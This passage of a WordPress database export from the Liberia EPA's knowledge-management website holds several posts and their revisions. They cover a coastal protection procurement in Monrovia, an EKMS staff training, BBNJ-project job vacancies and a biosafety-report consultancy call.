approach that addresses current and anticipated climate change risks and which mixes both infrastructure (where necessary) and coastal ecosystems in adaptation efforts.\r\n\r\nThe Environmental Protection Agency (EPA) is the principal authority in Liberia responsible for the management of the environment and natural resources and is empowered to coordinate, monitor, supervise and consult with relevant stakeholders on all activities in the protection of the environment and sustainable use of natural resources. The EPA, in close collaboration with the Ministry of Mines and Energy (MME), Ministry of Finance and Development Planning (MFDP), the Ministry of Public Works (MPW) are implementing the MMCRP through a Project Management Unit, based at the EPA. The UNDP, as an Accredited Entity to the GCF are providing oversight and quality assurance services to the MMCRP. The project Management Unit (PMU) is responsible for the implementation of the Project with support from the EPA and UNDP.\r\n\r\nUnder Output 1, the project intends to construct a combination of coastal protection structures (a\r\n\r\nrevetment and a breakwater) and associated amenities (a green promenade and trees) to protect West Point against climate-induced sea level rise and high-intensity storms. Therefore, a conceptual design was prepared as an output of the Engineering Sub-assessment done during project preparation.\r\n\r\n&nbsp;\r\n\r\nHowever, to mitigate any adverse flooding effects due to the construction of the aforementioned\r\n\r\nstructures, a project site-specific hydro-engineering study of West Point was conducted by qualified engineers to ensure that the risks of potential localized and broader flooding are incorporated in the detailed design of the defense structure. The final technical design was based on the existing conceptual design and considered best practices and lessons learned from other coastal protection interventions in Monrovia and elsewhere. This final design has also been informed by detailed geo-physical and social assessments, including an options analysis of nature- based solutions and other hard infrastructure options, and solicited the inputs of communities. Preventing both heavier water loads in the Mesurado Estuary and saline intrusion into freshwater aquifers were critical considerations in this initial design of this intervention. Notwithstanding, a critical aspect of ensuring a successful implementation is to have a realistic construction plan. Hence, a construction plan was developed after producing the detailed technical designs. The construction plan has identified all necessary inputs, construction packages, procurement procedures, contracting guidelines, relevant legislation, environmental and social safeguards (ESS) processes and gender- responsive stakeholder consultations. The final detailed technical design and construction plan considered input from community and government stakeholders and were validated.\r\n\r\n&nbsp;\r\n\r\nAn Environmental and Social Impact Assessment (ESIA) was conducted concurrently and informed the final detailed design of the revetment. The development of the Livelihood Restoration Plan (LRP), a sub-plan of the ESIA meant to mitigate the risk of economic displacement due to the construction, is about to commence and will be completed before construction starts. This is in accordance with the requirements of Liberian law, the funded activity agreement (FAA) for the project, and the project document; and follows the recommendations of the Environmental and Social Assessment Report (ESAR) which was submitted along with the funding proposal.\r\n\r\n&nbsp;\r\n\r\nThe complete tender package has been finalized and is being used to recruit a suitable <strong>international engineering firm</strong> to construct the coastal protection structures and associated amenities. See link below for more information:\r\n\r\n<u><a href=\"https://procurement-notices.undp.org/view_negotiation.cfm?nego_id=40374\">Procurement Notices - UNDP-LBR-00817 - Civil Works for Coastal protection structure &amp; Breakwater in Monrovia, Liberia</a></u>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Civil Works for Coastal protection structure & Breakwater in Monrovia, Liberia','','inherit','closed','closed','','5631-revision-v1','','','2025-11-11 19:42:17','2025-11-11 19:42:17','',5631,'https://ekmsliberia.info/?p=5635',0,'revision','',0),(5636,38,'2025-11-26 21:58:31','2025-11-26 21:58:31','<!-- wp:paragraph -->\n<p>Monrovia, Liberia – November 26, 2025 – The Environmental Protection Agency (EPA) yesterday launched an intensive two-day capacity-building program to equip staff across departments with hands-on expertise in the Environmental Knowledge Management System (EKMS)—a cornerstone of the Agency’s digital transformation and data-driven environmental governance.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training is being held in the Executive Director’s Conference Room.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Opening the session, Deputy Executive Director for Technical Services, Mr. Dweh S. Boley, called on participants to demonstrate focus and commitment, noting that the EKMS will elevate institutional performance, accelerate service delivery, and strengthen evidence-based decision-making.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He commended Assistant Director for ICT, Mr. Ujay Vah, for championing the initiative and driving the EPA’s innovation agenda.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Lead facilitator, Miss Elvina Samuels, outlined the EKMS’s core features and practical applications, emphasizing its role in modernizing research workflows, streamlining policy development, and standardizing knowledge sharing across the Agency.&nbsp; She highlighted the system’s seamless integration with the EPA’s upgraded E-Library, which will provide faster, easier access to high-value environmental data, reports, and research for staff and stakeholders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Participants were briefed on upcoming EKMS enhancements and the roadmap to a full public-facing launch for partners and stakeholders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training also served as a dynamic collaboration forum—connecting technical and program teams, igniting new ideas, and reinforcing a culture of teamwork and excellence within the EPA. Sharing the Executive Director’s vision, Mr. Ujay Vah underscored the EPA’s commitment to a state-of-the-art E-Library and robust EKMS deployment, noting the strategic importance of donor partnerships to scale and sustain the platform.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He expressed confidence that the training will empower staff to operationalize EKMS as a high-impact tool for environmental research, policy formulation, and national development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Call to Action: The EPA welcomes collaboration with development partners, academia, and civil society to advance Liberia’s digital environmental infrastructure.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For partnership opportunities or EKMS inquiries, please contact the EPA Communications Office at: info@gov.lr</p>\n<!-- /wp:paragraph -->','EPA Accelerates Digital Transformation with EKMS Staff Training','','publish','open','open','','epa-accelerates-digital-transformation-with-ekms-staff-training','','','2025-11-26 21:58:34','2025-11-26 21:58:34','',0,'https://ekmsliberia.info/?p=5636',36,'post','',0),(5637,38,'2025-11-26 21:57:18','2025-11-26 21:57:18','','EKMS NEW','','inherit','open','closed','','ekms-new','','','2025-11-26 21:57:18','2025-11-26 21:57:18','',5636,'https://ekmsliberia.info/wp-content/uploads/2025/11/EKMS-NEW.jpeg',0,'attachment','image/jpeg',0),(5638,38,'2025-11-26 21:58:31','2025-11-26 21:58:31','<!-- wp:paragraph -->\n<p>Monrovia, Liberia – November 26, 2025 – The Environmental Protection Agency (EPA) yesterday launched an intensive two-day capacity-building program to equip staff across departments with hands-on expertise in the Environmental Knowledge Management System (EKMS)—a cornerstone of the Agency’s digital transformation and data-driven environmental governance.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training is being held in the Executive Director’s Conference Room.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Opening the session, Deputy Executive Director for Technical Services, Mr. Dweh S. Boley, called on participants to demonstrate focus and commitment, noting that the EKMS will elevate institutional performance, accelerate service delivery, and strengthen evidence-based decision-making.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He commended Assistant Director for ICT, Mr. Ujay Vah, for championing the initiative and driving the EPA’s innovation agenda.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Lead facilitator, Miss Elvina Samuels, outlined the EKMS’s core features and practical applications, emphasizing its role in modernizing research workflows, streamlining policy development, and standardizing knowledge sharing across the Agency.&nbsp; She highlighted the system’s seamless integration with the EPA’s upgraded E-Library, which will provide faster, easier access to high-value environmental data, reports, and research for staff and stakeholders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Participants were briefed on upcoming EKMS enhancements and the roadmap to a full public-facing launch for partners and stakeholders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training also served as a dynamic collaboration forum—connecting technical and program teams, igniting new ideas, and reinforcing a culture of teamwork and excellence within the EPA. Sharing the Executive Director’s vision, Mr. Ujay Vah underscored the EPA’s commitment to a state-of-the-art E-Library and robust EKMS deployment, noting the strategic importance of donor partnerships to scale and sustain the platform.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He expressed confidence that the training will empower staff to operationalize EKMS as a high-impact tool for environmental research, policy formulation, and national development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Call to Action: The EPA welcomes collaboration with development partners, academia, and civil society to advance Liberia’s digital environmental infrastructure.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For partnership opportunities or EKMS inquiries, please contact the EPA Communications Office at: info@gov.lr</p>\n<!-- /wp:paragraph -->','EPA Accelerates Digital Transformation with EKMS Staff Training','','inherit','closed','closed','','5636-revision-v1','','','2025-11-26 21:58:31','2025-11-26 21:58:31','',5636,'https://ekmsliberia.info/?p=5638',0,'revision','',0),(5639,38,'2025-12-01 14:22:23','2025-12-01 14:22:23','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe United Nations Convention on the Law of the Sea (UNCLOS), adopted in 1982, sets out the legal framework within which all activities in the oceans and seas must be carried out. It was then supplemented by two implementing agreements. Although UNCLOS contains provisions for the protection and preservation of the marine environment and the sustainable management of ocean resources, the United Nations (UN) General Assembly recognized that there was a need for the comprehensive legal regime under UNCLOS to better address the conservation and sustainable use of marine biodiversity of Areas Beyound Naitonal Judrisdation (ABNJ). Ultimately, this recognition culminated in the adoption of the United Nations Convention on the Law of the Sea on the Conservation and Sustainable Use of Marine Biological Diversity of Areas Beyond National Jurisdiction” (the BBNJ Agreement) on 19 June 2023, after nearly two decades of negotiations under various format. The BBNJ Agreement is the outcome of a long, iterative process that was initiated by the United Nations General Assembly (UNGA) in 2004. This process was completed with the adoption of the Agreement at the fifth session of the Intergovernmental conference on an international legally binding instrument under UNCLOS on the conservation and sustainable use of marine biological diversity of areas beyond national jurisdiction, in June 2023. The BBNJ Agreement is the third implementing agreement to the UNCLOS. The Agreement opened for signature in September 2023, s ixty instruments of ratification, approval, acceptance or accession are required for the Agreement to enter into force. The UNGA, in its resolution emphasized the importance of the early entry into force and effective implementation of the Agreement. To this end, timely support to national processes towards becoming parties to the Agreement and implementation readiness is critical. The African region is now united behind the urgent need to ratify the BBNJ treaty “at the earliest possible date,” as reiterated by the Addis Ababa Declaration adopted at the 19th ordinary session of the African Ministerial Conference on the Environment (AMCEN-19, 17-18 August 2023). The Government of Liberia, having actively participated in the regional meeting of ECOWAS member States planned on 20-22 November 2023 proceeded to sign the agreement in Septeber 2024 and later ratified in June 2025. The Biodiversity Beyond National Jurisdiction (BBNJ) Treaty stands as a pivotal instrument in this endeavor, reflecting Liberia\'s commitment to international cooperation and environmental stewardship.\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/12/Vacancy-for-ME-Assistant-BBNJ.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','Monitoring & Evaluation (M&E) Assistant','','publish','closed','closed','','monitoring-evaluation-me-assistant','','','2025-12-01 14:22:23','2025-12-01 14:22:23','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5639',35,'ekms_bulletin','',0),(5640,38,'2025-12-01 14:19:16','2025-12-01 14:19:16','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe United Nations Convention on the Law of the Sea (UNCLOS), adopted in 1982, sets out the legal framework within which all activities in the oceans and seas must be carried out. It was then supplemented by two implementing agreements. Although UNCLOS contains provisions for the protection and preservation of the marine environment and the sustainable management of ocean resources, the United Nations (UN) General Assembly recognized that there was a need for the comprehensive legal regime under UNCLOS to better address the conservation and sustainable use of marine biodiversity of Areas Beyound Naitonal Judrisdation (ABNJ). Ultimately, this recognition culminated in the adoption of the United Nations Convention on the Law of the Sea on the Conservation and Sustainable Use of Marine Biological Diversity of Areas Beyond National Jurisdiction” (the BBNJ Agreement) on 19 June 2023, after nearly two decades of negotiations under various format. The BBNJ Agreement is the outcome of a long, iterative process that was initiated by the United Nations General Assembly (UNGA) in 2004. This process was completed with the adoption of the Agreement at the fifth session of the Intergovernmental conference on an international legally binding instrument under UNCLOS on the conservation and sustainable use of marine biological diversity of areas beyond national jurisdiction, in June 2023. The BBNJ Agreement is the third implementing agreement to the UNCLOS. The Agreement opened for signature in September 2023, s ixty instruments of ratification, approval, acceptance or accession are required for the Agreement to enter into force. The UNGA, in its resolution emphasized the importance of the early entry into force and effective implementation of the Agreement. To this end, timely support to national processes towards becoming parties to the Agreement and implementation readiness is critical. The African region is now united behind the urgent need to ratify the BBNJ treaty “at the earliest possible date,” as reiterated by the Addis Ababa Declaration adopted at the 19th ordinary session of the African Ministerial Conference on the Environment (AMCEN-19, 17-18 August 2023). The Government of Liberia, having actively participated in the regional meeting of ECOWAS member States planned on 20-22 November 2023 proceeded to sign the agreement in Septeber 2024 and later ratified in June 2025. The Biodiversity Beyond National Jurisdiction (BBNJ) Treaty stands as a pivotal instrument in this endeavor, reflecting Liberia\'s commitment to international cooperation and environmental stewardship.\r\n\r\nClick:','Monitoring & Evaluation (M&E) Assistant','','inherit','closed','closed','','5639-revision-v1','','','2025-12-01 14:19:16','2025-12-01 14:19:16','',5639,'https://ekmsliberia.info/?p=5640',0,'revision','',0),(5641,38,'2025-12-01 14:20:38','2025-12-01 14:20:38','','Vacancy for M&E Assistant (BBNJ)','','inherit','open','closed','','vacancy-for-me-assistant-bbnj','','','2025-12-01 14:20:38','2025-12-01 14:20:38','',0,'https://ekmsliberia.info/wp-content/uploads/2025/12/Vacancy-for-ME-Assistant-BBNJ.pdf',0,'attachment','application/pdf',0),(5642,38,'2025-12-01 14:22:23','2025-12-01 14:22:23','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe United Nations Convention on the Law of the Sea (UNCLOS), adopted in 1982, sets out the legal framework within which all activities in the oceans and seas must be carried out. It was then supplemented by two implementing agreements. Although UNCLOS contains provisions for the protection and preservation of the marine environment and the sustainable management of ocean resources, the United Nations (UN) General Assembly recognized that there was a need for the comprehensive legal regime under UNCLOS to better address the conservation and sustainable use of marine biodiversity of Areas Beyound Naitonal Judrisdation (ABNJ). Ultimately, this recognition culminated in the adoption of the United Nations Convention on the Law of the Sea on the Conservation and Sustainable Use of Marine Biological Diversity of Areas Beyond National Jurisdiction” (the BBNJ Agreement) on 19 June 2023, after nearly two decades of negotiations under various format. The BBNJ Agreement is the outcome of a long, iterative process that was initiated by the United Nations General Assembly (UNGA) in 2004. This process was completed with the adoption of the Agreement at the fifth session of the Intergovernmental conference on an international legally binding instrument under UNCLOS on the conservation and sustainable use of marine biological diversity of areas beyond national jurisdiction, in June 2023. The BBNJ Agreement is the third implementing agreement to the UNCLOS. The Agreement opened for signature in September 2023, s ixty instruments of ratification, approval, acceptance or accession are required for the Agreement to enter into force. The UNGA, in its resolution emphasized the importance of the early entry into force and effective implementation of the Agreement. To this end, timely support to national processes towards becoming parties to the Agreement and implementation readiness is critical. The African region is now united behind the urgent need to ratify the BBNJ treaty “at the earliest possible date,” as reiterated by the Addis Ababa Declaration adopted at the 19th ordinary session of the African Ministerial Conference on the Environment (AMCEN-19, 17-18 August 2023). The Government of Liberia, having actively participated in the regional meeting of ECOWAS member States planned on 20-22 November 2023 proceeded to sign the agreement in Septeber 2024 and later ratified in June 2025. The Biodiversity Beyond National Jurisdiction (BBNJ) Treaty stands as a pivotal instrument in this endeavor, reflecting Liberia\'s commitment to international cooperation and environmental stewardship.\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/12/Vacancy-for-ME-Assistant-BBNJ.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','Monitoring & Evaluation (M&E) Assistant','','inherit','closed','closed','','5639-revision-v1','','','2025-12-01 14:22:23','2025-12-01 14:22:23','',5639,'https://ekmsliberia.info/?p=5642',0,'revision','',0),(5643,38,'2025-12-01 14:34:20','2025-12-01 14:34:20','<strong>PROJECT BACKGROUND:</strong>\r\n\r\nThe United Nations Convention on the Law of the Sea (UNCLOS), adopted in 1982, sets out the legal framework within which all activities in the oceans and seas must be carried out. It was then supplemented by two implementing agreements. Although UNCLOS contains provisions for the protection and preservation of the marine environment and the sustainable management of ocean resources, the United Nations (UN) General Assembly recognized that there was a need for the comprehensive legal regime under UNCLOS to better address the conservation and sustainable use of marine biodiversity of Areas Beyound Naitonal Judrisdation (ABNJ). Ultimately, this recognition culminated in the adoption of the United Nations Convention on the Law of the Sea on the Conservation and Sustainable Use of Marine Biological Diversity of Areas Beyond National Jurisdiction” (the BBNJ Agreement) on 19 June 2023, after nearly two decades of negotiations under various format. The BBNJ Agreement is the outcome of a long, iterative process that was initiated by the United Nations General Assembly (UNGA) in 2004. This process was completed with the adoption of the Agreement at the fifth session of the Intergovernmental conference on an international legally binding instrument under UNCLOS on the conservation and sustainable use of marine biological diversity of areas beyond national jurisdiction, in June 2023. The BBNJ Agreement is the third implementing agreement to the UNCLOS. The Agreement opened for signature in September 2023, s ixty instruments of ratification, approval, acceptance or accession are required for the Agreement to enter into force. The UNGA, in its resolution emphasized the importance of the early entry into force and effective implementation of the Agreement. To this end, timely support to national processes towards becoming parties to the Agreement and implementation readiness is critical. The African region is now united behind the urgent need to ratify the BBNJ treaty “at the earliest possible date,” as reiterated by the Addis Ababa Declaration adopted at the 19th ordinary session of the African Ministerial Conference on the Environment (AMCEN-19, 17-18 August 2023). The Government of Liberia, having actively participated in the regional meeting of ECOWAS member States planned on 20-22 November 2023 proceeded to sign the agreement in Septeber 2024 and later ratified in June 2025. The Biodiversity Beyond National Jurisdiction (BBNJ) Treaty stands as a pivotal instrument in this endeavor, reflecting Liberia\'s commitment to international cooperation and environmental stewardship.\r\n\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/12/Vacancy-for-Admin-and-Finance-Assistant-BBNJ.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','Administration & Finance Assistant','','publish','closed','closed','','administration-finance-assistant','','','2025-12-01 14:35:58','2025-12-01 14:35:58','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5643',34,'ekms_bulletin','',0),(5644,38,'2025-12-01 14:29:58','2025-12-01 14:29:58','<strong>PROJECT BACKGROUND:</strong>\r\n\r\nThe United Nations Convention on the Law of the Sea (UNCLOS), adopted in 1982, sets out the legal framework within which all activities in the oceans and seas must be carried out. It was then supplemented by two implementing agreements. Although UNCLOS contains provisions for the protection and preservation of the marine environment and the sustainable management of ocean resources, the United Nations (UN) General Assembly recognized that there was a need for the comprehensive legal regime under UNCLOS to better address the conservation and sustainable use of marine biodiversity of Areas Beyound Naitonal Judrisdation (ABNJ). Ultimately, this recognition culminated in the adoption of the United Nations Convention on the Law of the Sea on the Conservation and Sustainable Use of Marine Biological Diversity of Areas Beyond National Jurisdiction” (the BBNJ Agreement) on 19 June 2023, after nearly two decades of negotiations under various format. The BBNJ Agreement is the outcome of a long, iterative process that was initiated by the United Nations General Assembly (UNGA) in 2004. This process was completed with the adoption of the Agreement at the fifth session of the Intergovernmental conference on an international legally binding instrument under UNCLOS on the conservation and sustainable use of marine biological diversity of areas beyond national jurisdiction, in June 2023. The BBNJ Agreement is the third implementing agreement to the UNCLOS. The Agreement opened for signature in September 2023, s ixty instruments of ratification, approval, acceptance or accession are required for the Agreement to enter into force. The UNGA, in its resolution emphasized the importance of the early entry into force and effective implementation of the Agreement. To this end, timely support to national processes towards becoming parties to the Agreement and implementation readiness is critical. The African region is now united behind the urgent need to ratify the BBNJ treaty “at the earliest possible date,” as reiterated by the Addis Ababa Declaration adopted at the 19th ordinary session of the African Ministerial Conference on the Environment (AMCEN-19, 17-18 August 2023). The Government of Liberia, having actively participated in the regional meeting of ECOWAS member States planned on 20-22 November 2023 proceeded to sign the agreement in Septeber 2024 and later ratified in June 2025. The Biodiversity Beyond National Jurisdiction (BBNJ) Treaty stands as a pivotal instrument in this endeavor, reflecting Liberia\'s commitment to international cooperation and environmental stewardship.\r\n\r\n&nbsp;\r\n\r\nClick to:','Administration & Finance Assistant','','inherit','closed','closed','','5643-revision-v1','','','2025-12-01 14:29:58','2025-12-01 14:29:58','',5643,'https://ekmsliberia.info/?p=5644',0,'revision','',0),(5645,38,'2025-12-01 14:30:52','2025-12-01 14:30:52','','Vacancy for Admin and Finance Assistant (BBNJ)','','inherit','open','closed','','vacancy-for-admin-and-finance-assistant-bbnj','','','2025-12-01 14:30:52','2025-12-01 14:30:52','',0,'https://ekmsliberia.info/wp-content/uploads/2025/12/Vacancy-for-Admin-and-Finance-Assistant-BBNJ.pdf',0,'attachment','application/pdf',0),(5646,38,'2025-12-01 14:34:20','2025-12-01 14:34:20','<strong>PROJECT BACKGROUND:</strong>\r\n\r\nThe United Nations Convention on the Law of the Sea (UNCLOS), adopted in 1982, sets out the legal framework within which all activities in the oceans and seas must be carried out. It was then supplemented by two implementing agreements. Although UNCLOS contains provisions for the protection and preservation of the marine environment and the sustainable management of ocean resources, the United Nations (UN) General Assembly recognized that there was a need for the comprehensive legal regime under UNCLOS to better address the conservation and sustainable use of marine biodiversity of Areas Beyound Naitonal Judrisdation (ABNJ). Ultimately, this recognition culminated in the adoption of the United Nations Convention on the Law of the Sea on the Conservation and Sustainable Use of Marine Biological Diversity of Areas Beyond National Jurisdiction” (the BBNJ Agreement) on 19 June 2023, after nearly two decades of negotiations under various format. The BBNJ Agreement is the outcome of a long, iterative process that was initiated by the United Nations General Assembly (UNGA) in 2004. This process was completed with the adoption of the Agreement at the fifth session of the Intergovernmental conference on an international legally binding instrument under UNCLOS on the conservation and sustainable use of marine biological diversity of areas beyond national jurisdiction, in June 2023. The BBNJ Agreement is the third implementing agreement to the UNCLOS. The Agreement opened for signature in September 2023, s ixty instruments of ratification, approval, acceptance or accession are required for the Agreement to enter into force. The UNGA, in its resolution emphasized the importance of the early entry into force and effective implementation of the Agreement. To this end, timely support to national processes towards becoming parties to the Agreement and implementation readiness is critical. The African region is now united behind the urgent need to ratify the BBNJ treaty “at the earliest possible date,” as reiterated by the Addis Ababa Declaration adopted at the 19th ordinary session of the African Ministerial Conference on the Environment (AMCEN-19, 17-18 August 2023). The Government of Liberia, having actively participated in the regional meeting of ECOWAS member States planned on 20-22 November 2023 proceeded to sign the agreement in Septeber 2024 and later ratified in June 2025. The Biodiversity Beyond National Jurisdiction (BBNJ) Treaty stands as a pivotal instrument in this endeavor, reflecting Liberia\'s commitment to international cooperation and environmental stewardship.\r\n\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/12/Vacancy-for-Admin-and-Finance-Assistant-BBNJ.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','Administration & Finance Assistant','','inherit','closed','closed','','5643-revision-v1','','','2025-12-01 14:34:20','2025-12-01 14:34:20','',5643,'https://ekmsliberia.info/?p=5646',0,'revision','',0),(5649,38,'2025-12-03 13:10:07','2025-12-03 13:10:07','<strong>Background</strong>\r\n\r\nLiberia is a member of the Cartagena Protocol on Biosafety under the Convention on Biological Diversity. The objective of the protocol is to ensure the safe handling, transport and use of living modified organisms resulting from modern Biotechnology that may have adverse effects on biological diversity (in Liberia), taking also into account human, animals and plants health.  The COP-MOP in decision <a href=\"https://www.cbd.int/doc/decisions/cp-mop-09/cp-mop-09-dec-05-en.pdf\">9/5</a> (para 2) welcomed the reporting format for the national report on the implementation of the Protocol proposed by the Secretariat and requested Parties to use it for the preparation of their Fifth national reports, through a consultative process involving all relevant stakeholders. It also encouraged Parties to respond to all questions in the reporting format to facilitate the establishment of baselines for subsequent assessment and review of the effectiveness of the Protocol and also facilitate the monitoring of progress towards the implementation of the objectives identified in the Strategic Plan. Parties that encounter difficulty in completing and submitting their national report on time were encouraged to seek assistance from the Secretariat or the Compliance Committee, and/or make use of the roster of biosafety experts [BS V/14 paras 4 – 7}.  Parties also requested in decision 9/5 (para 8) for GEF support to the Fifth national reporting. As a response to the request to the GEF as a funding mechanism as captured in Decision <a href=\"https://www.cbd.int/doc/decisions/cp-mop-09/cp-mop-09-dec-04-en.pdf\">9/4</a>, the Executive Secretary of the SCBD released a notification on support for the Fifth national reporting to the CBD Focal Points and National Focal Points for the Cartagena Protocol on Biosafety. According to decision <a href=\"https://www.cbd.int/doc/decisions/cp-mop-09/cp-mop-09-dec-05-en.pdf\">9/5</a>, The Fifth regular national report is to be submitted to the Secretariat (Twelve months prior to the sixteenth meeting of the Conference of the Parties serving as the meeting of the Parties to the Protocol), in an official language of the United Nations through the BCH.  Parties are encouraged to respond to all questions in the reporting form. Complete information is required for the establishment of baseline data for the subsequent assessment and review processes of the Protocol as required for article 35 with guidance in BS VII/3 as well as the mid-term review of the progress in the implementation of the <a href=\"http://bch.cbd.int/protocol/decisions/?decisionID=12329\">Biosafety Strategic Plan 2011 – 2030</a> .\r\n\r\n<strong>Purpose/Objective</strong>\r\n<ol>\r\n 	<li>The Agreement sets Fifth the terms and conditions of the cooperation between The Parties for the execution of the project “Support to Preparation of the Fifth National Biosafety Reports to the Cartagena Protocol on Biosafety - AFRICA REGION” as set out in the Project document appended as Annex 1 and approved by the Global Environment Facility (GEF) Chief Executive Officer (CEO) in the letter dated 23 September 2025 appended as Annex 2. The details of the various activities under the project are as set out in Annex 1, the Toolkit for the execution of National Reporting on Biosafety.</li>\r\n 	<li>The main objective of the project is to assist GEF-Eligible Parties to the Cartagena Protocol on Biosafety to prepare and make timely submission of their Fifth National Report on measures that each party has taken to implement the Protocol in line with Article 33 of the Cartagena Protocol on Biosafety through an umbrella Regional Medium Size Project, due to be submitted on the Biosafety Clearing-House (BCH) website by the respective BCH National Focal Point or offline by the designated National Focal Points to the SCBD by email (<a href=\"mailto:secretariat@cbd.int\">secretariat@cbd.int</a>) for upload, on or before 28<sup>th</sup> February, 2026.</li>\r\n</ol>\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/12/Announcement-to-Recruit-Consultnats.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','National Consultancy : To prepare the Fourth National Biosafety Report of Liberia, CP4NR','','publish','closed','closed','','national-consultancy-to-prepare-the-fourth-national-biosafety-report-of-liberia-cp4nr','','','2025-12-03 13:12:07','2025-12-03 13:12:07','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5649',33,'ekms_bulletin','',0),(5650,38,'2025-12-03 12:56:23','2025-12-03 12:56:23','<strong>Background</strong>\r\n\r\nLiberia is a member of the Cartagena Protocol on Biosafety under the Convention on Biological Diversity. The objective of the protocol is to ensure the safe handling, transport and use of living modified organisms resulting from modern Biotechnology that may have adverse effects on biological diversity (in Liberia), taking also into account human, animals and plants health.  The COP-MOP in decision <a href=\"https://www.cbd.int/doc/decisions/cp-mop-09/cp-mop-09-dec-05-en.pdf\">9/5</a> (para 2) welcomed the reporting format for the national report on the implementation of the Protocol proposed by the Secretariat and requested Parties to use it for the preparation of their Fifth national reports, through a consultative process involving all relevant stakeholders. It also encouraged Parties to respond to all questions in the reporting format to facilitate the establishment of baselines for subsequent assessment and review of the effectiveness of the Protocol and also facilitate the monitoring of progress towards the implementation of the objectives identified in the Strategic Plan. Parties that encounter difficulty in completing and submitting their national report on time were encouraged to seek assistance from the Secretariat or the Compliance Committee, and/or make use of the roster of biosafety experts [BS V/14 paras 4 – 7}.  Parties also requested in decision 9/5 (para 8) for GEF support to the Fifth national reporting. As a response to the request to the GEF as a funding mechanism as captured in Decision <a href=\"https://www.cbd.int/doc/decisions/cp-mop-09/cp-mop-09-dec-04-en.pdf\">9/4</a>, the Executive Secretary of the SCBD released a notification on support for the Fifth national reporting to the CBD Focal Points and National Focal Points for the Cartagena Protocol on Biosafety. According to decision <a href=\"https://www.cbd.int/doc/decisions/cp-mop-09/cp-mop-09-dec-05-en.pdf\">9/5</a>, The Fifth regular national report is to be submitted to the Secretariat (Twelve months prior to the sixteenth meeting of the Conference of the Parties serving as the meeting of the Parties to the Protocol), in an official language of the United Nations through the BCH.  Parties are encouraged to respond to all questions in the reporting form. Complete information is required for the establishment of baseline data for the subsequent assessment and review processes of the Protocol as required for article 35 with guidance in BS VII/3 as well as the mid-term review of the progress in the implementation of the <a href=\"http://bch.cbd.int/protocol/decisions/?decisionID=12329\">Biosafety Strategic Plan 2011 – 2030</a> .\r\n\r\n<strong>Purpose/Objective</strong>\r\n<ol>\r\n 	<li>The Agreement sets Fifth the terms and conditions of the cooperation between The Parties for the execution of the project “Support to Preparation of the Fifth National Biosafety Reports to the Cartagena Protocol on Biosafety - AFRICA REGION” as set out in the Project document appended as Annex 1 and approved by the Global Environment Facility (GEF) Chief Executive Officer (CEO) in the letter dated 23 September 2025 appended as Annex 2. The details of the various activities under the project are as set out in Annex 1, the Toolkit for the execution of National Reporting on Biosafety.</li>\r\n 	<li>The main objective of the project is to assist GEF-Eligible Parties to the Cartagena Protocol on Biosafety to prepare and make timely submission of their Fifth National Report on measures that each party has taken to implement the Protocol in line with Article 33 of the Cartagena Protocol on Biosafety through an umbrella Regional Medium Size Project, due to be submitted on the Biosafety Clearing-House (BCH) website by the respective BCH National Focal Point or offline by the designated National Focal Points to the SCBD by email (<a href=\"mailto:secretariat@cbd.int\">secretariat@cbd.int</a>) for upload, on or before 28<sup>th</sup> February, 2026.</li>\r\n</ol>','National Consultancy : To prepare the Fourth National Biosafety Report of Liberia, CP4NR','','inherit','closed','closed','','5649-revision-v1','','','2025-12-03 12:56:23','2025-12-03 12:56:23','',5649,'https://ekmsliberia.info/?p=5650',0,'revision','',0),(5651,38,'2025-12-03 13:08:37','2025-12-03 13:08:37','','Announcement to Recruit Consultnats','','inherit','open','closed','','announcement-to-recruit-consultnats','','','2025-12-03 13:08:37','2025-12-03 13:08:37','',0,'https://ekmsliberia.info/wp-content/uploads/2025/12/Announcement-to-Recruit-Consultnats.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5652,38,'2025-12-03 13:10:07','2025-12-03 13:10:07','<strong>Background</strong>\r\n\r\nLiberia is a member of the Cartagena Protocol on Biosafety under the Convention on Biological Diversity. The objective of the protocol is to ensure the safe handling, transport and 